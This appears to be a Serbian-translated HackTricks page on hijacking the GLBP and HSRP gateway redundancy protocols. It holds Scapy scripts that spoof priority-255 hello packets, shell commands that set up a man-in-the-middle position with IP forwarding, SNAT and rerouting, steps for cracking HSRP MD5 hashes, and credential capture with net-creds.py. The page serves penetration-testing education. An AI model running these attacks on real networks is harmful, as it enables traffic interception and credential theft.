GLBP & HSRP Napadi

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Pregled FHRP Hijacking

Uvidi u FHRP

FHRP je dizajniran da obezbedi robusnost mreže spajanjem više rutera u jedinstvenu virtuelnu jedinicu, čime se poboljšava raspodela opterećenja i tolerancija na greške. Cisco Systems je u ovu porodicu protokola uveo istaknute protokole kao što su GLBP i HSRP.

Uvidi u GLBP protokol

Cisco-ov GLBP radi na TCP/IP sloju, koristeći UDP na portu 3222 za komunikaciju. Ruteri u GLBP grupi razmenjuju “hello” pakete na svakih 3 sekunde. Ako ruter ne pošalje ove pakete tokom 10 sekundi, smatra se da je van mreže. Međutim, ovi tajmeri nisu fiksni i mogu se menjati.

GLBP za IPv6 koristi multicast FF02::66 preko UDP/3222, i format virtuelnog MAC-a postaje 0007.b4xx.xxyy (AVF ID je u poslednjem bajtu). Tajming i površina napada ostaju isti kao i kod IPv4, tako da hijack techniques i dalje rade u dual‑stack mrežama.

GLBP operacije i raspodela opterećenja

GLBP se izdvaja omogućavajući raspodelu opterećenja preko rutera koristeći jednu virtuelnu IP adresu u kombinaciji sa više virtuelnih MAC adresa. U GLBP grupi, svaki ruter učestvuje u prosleđivanju paketa. Za razliku od HSRP/VRRP, GLBP pruža pravu balansiranje opterećenja kroz nekoliko mehanizama:

  • Host-Dependent Load Balancing: Održava konzistentnu dodelu AVF MAC adrese za host, što je ključno za stabilne NAT konfiguracije.
  • Round-Robin Load Balancing: Podrazumevani pristup, naizmenično dodeljuje AVF MAC adresu među zahtevajućim hostovima.
  • Weighted Round-Robin Load Balancing: Raspodela opterećenja bazirana na unapred definisanim “Weight” metrikama.

Ključne komponente i terminologija u GLBP

  • AVG (Active Virtual Gateway): Glavni ruter, odgovoran za dodeljivanje MAC adresa peer ruterima.
  • AVF (Active Virtual Forwarder): Ruter zadužen za upravljanje mrežnim saobraćajem.
  • GLBP Priority: Metrička vrednost koja određuje AVG; podrazumevano počinje od 100 i kreće se između 1 i 255.
  • GLBP Weight: Odražava trenutno opterećenje rutera, može se podešavati ručno ili preko Object Tracking.
  • GLBP Virtual IP Address: Služi kao podrazumevani gateway mreže za sve povezane uređaje.

Za interakciju GLBP koristi rezervisanu multicast adresu 224.0.0.102 i UDP port 3222. Ruteri šalju “hello” pakete na svakih 3 sekunde, i smatraju se neoperativnim ako se paket ne primi u trajanju od 10 sekundi.

Mehanizam napada na GLBP

Napadač može postati primarni ruter slanjem GLBP paketa sa najvišom vrednošću prioriteta (255). Ovo može dovesti do DoS ili MITM napada, omogućavajući presretanje ili preusmeravanje saobraćaja.

Praktičan GLBP hijack sa Scapy (short PoC)

from scapy.all import *

vip = "10.10.100.254"          # learned from sniffing
pkt = IP(dst="224.0.0.102")/UDP(dport=3222,sport=3222)/Raw(
b"\x01\x00\xff\x64"      # Version=1, Opcode=Hello, Priority=255, Weight=100
)
send(pkt, iface="eth0", loop=1, inter=1)

Sastavite payload bajtove da oponašaju GLBP header (version/opcode/priority/weight/VRID). Ponavljanje frame-a osigurava da osvojite AVG election ako authentication nije prisutna.

Izvođenje GLBP Attack-a pomoću Loki

Loki može izvesti GLBP attack ubacivanjem paketa sa priority i weight postavljenim na 255. Koraci pre napada uključuju prikupljanje informacija kao što su virtual IP address, prisustvo authentication i vrednosti router priority koristeći alate kao što je Wireshark.

Attack Steps:

  1. Prebacite interfejs u promiscuous mode i omogućite IP forwarding.
  2. Identifikujte ciljani router i dobijte njegovu IP adresu.
  3. Generišite Gratuitous ARP.
  4. Injektujte maliciozni GLBP packet, predstavljajući se kao AVG.
  5. Dodelite sekundarnu IP adresu na mrežni interfejs napadača, koja reflektuje GLBP virtual IP.
  6. Implementirajte SNAT radi potpunog uvida u traffic.
  7. Prilagodite routing kako biste obezbedili neprekinut internet pristup kroz originalni AVG router.

Prateći ove korake, napadač se postavlja kao “man in the middle”, sposoban da presreće i analizira network traffic, uključujući nešifrovane ili osetljive podatke.

For demonstration, here are the required command snippets:

# Enable promiscuous mode and IP forwarding
sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1

# Configure secondary IP and SNAT
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

# Adjust routing
sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100

Praćenje i presretanje saobraćaja može se izvršiti korišćenjem net-creds.py ili sličnih alata za hvatanje i analizu podataka koji prolaze kroz kompromitovanu mrežu.

Pasivno objašnjenje otmice HSRP-a sa detaljima komandi

Pregled HSRP (Hot Standby Router/Redundancy Protocol)

HSRP je Cisco proprietarni protokol dizajniran za redundantnost mrežnog gateway-a. Omogućava konfigurisanje više fizičkih rutera u jednu logičku jedinicu sa zajedničkom IP adresom. Tom logičkom jedinicom upravlja primarni ruter koji je odgovoran za usmeravanje saobraćaja. Za razliku od GLBP, koji koristi metrike kao što su priority i weight za load balancing, HSRP se oslanja na jedan aktivni ruter za upravljanje saobraćajem.

HSRPv1 koristi multicast 224.0.0.2 i virtuelni MAC 0000.0c07.acXX; HSRPv2 i HSRPv2 za IPv6 koriste 224.0.0.102 / FF02::66 i virtuelni MAC 0000.0c9f.fXXX. UDP destinacioni port je 1985 za IPv4 i 2029 za IPv6.

Uloge i terminologija u HSRP

  • HSRP Active Router: Uređaj koji funkcioniše kao gateway i upravlja protokom saobraćaja.
  • HSRP Standby Router: Rezervni ruter, spreman da preuzme ulogu ako aktivni ruter zakaže.
  • HSRP Group: Skup rutera koji sarađuju da formiraju jedinstveni otporan virtuelni ruter.
  • HSRP MAC Address: Virtuelna MAC adresa dodeljena logičkom ruteru u HSRP konfiguraciji.
  • HSRP Virtual IP Address: Virtuelna IP adresa HSRP grupe, koja služi kao podrazumevani gateway za povezane uređaje.

Verzije HSRP

HSRP postoji u dve verzije, HSRPv1 i HSRPv2, koje se uglavnom razlikuju po kapacitetu grupa, upotrebi multicast IP adresa i strukturi virtuelnih MAC adresa. Protokol koristi specifične multicast IP adrese za razmenu servisnih informacija, pri čemu se Hello paketi šalju svake 3 sekunde. Ruter se smatra neaktivnim ako se ne primi nijedan paket u roku od 10 sekundi.

Mehanizam napada na HSRP

HSRP napadi uključuju nasilno preuzimanje uloge Active Router-a ubrizgavanjem maksimalne priority vrednosti. To može dovesti do Man-In-The-Middle (MITM) napada. Neophodni koraci pre napada uključuju prikupljanje podataka o HSRP konfiguraciji, što se može uraditi korišćenjem Wireshark-a za analizu saobraćaja.

Brzo preuzimanje HSRP-a pomoću Scapy

from scapy.all import *

vip = "10.10.100.1"
pkt = IP(dst="224.0.0.102")/UDP(sport=1985,dport=1985)/Raw(
b"\x00\x02\xff\x03\x00\x00\x00\x01"  # Hello, priority 255, group 1
)
send(pkt, iface="eth0", inter=1, loop=1)

Ako autentikacija nije konfigurisana, kontinuirano slanje hellos sa višim prioritetom primorava peer-ove u Speak/Listen stanja i omogućava vam da postanete Active, preusmeravajući saobraćaj kroz vaš host.

Rubni slučajevi autentikacije HSRP

  • Legacy plain-text auth je trivijalno spoofable.
  • MD5 authentication pokriva samo HSRP payload; kreirani paketi i dalje mogu rate-limit/DoS control plane-ove. NX-OS release-ovi su ranije omogućavali DoS protiv autenticiranih grupa (pogledajte Cisco advisory CSCup11309).
  • Na mnogim ISP / VPS shared VLAN-ovima, HSRPv1 multicasti su vidljivi tenantima; bez auth možete se pridružiti i preempt-ovati saobraćaj.

Koraci za zaobilaženje autentikacije HSRP

  1. Sačuvajte mrežni saobraćaj koji sadrži HSRP podatke kao .pcap fajl.
tcpdump -w hsrp_traffic.pcap
  1. Ekstrahujte MD5 hash-e iz .pcap fajla koristeći hsrp2john.py.
python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes
  1. Crack-ujte MD5 hash-e koristeći John the Ripper.
john --wordlist=mywordlist.txt hsrp_hashes

Izvođenje HSRP Injection-a pomoću Loki

  1. Pokrenite Loki da identifikujete HSRP advertisements.
  2. Podesite mrežni interfejs u promiscuous mode i omogućite IP forwarding.
sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1
  1. Koristite Loki da ciljate specifični router, unesete ukraden/cracked HSRP password i izvršite potrebne konfiguracije da se lažno predstavite kao Active Router.
  2. Nakon što dobijete Active Router ulogu, konfigurišite vaš mrežni interfejs i iptables da presretnete legitimni saobraćaj.
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
  1. Izmenite routing tabelu da usmerite saobraćaj kroz bivši Active Router.
sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
  1. Koristite net-creds.py ili sličan alat za hvatanje kredencijala iz presretnutog saobraćaja.
sudo python2 net-creds.py -i eth0

Izvođenje ovih koraka stavlja napadača u poziciju da presreće i manipuliše saobraćajem, slično proceduri za GLBP hijacking. Ovo ističe ranjivost u redundantnim protokolima kao što je HSRP i potrebu za snažnim bezbednosnim merama.

References

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks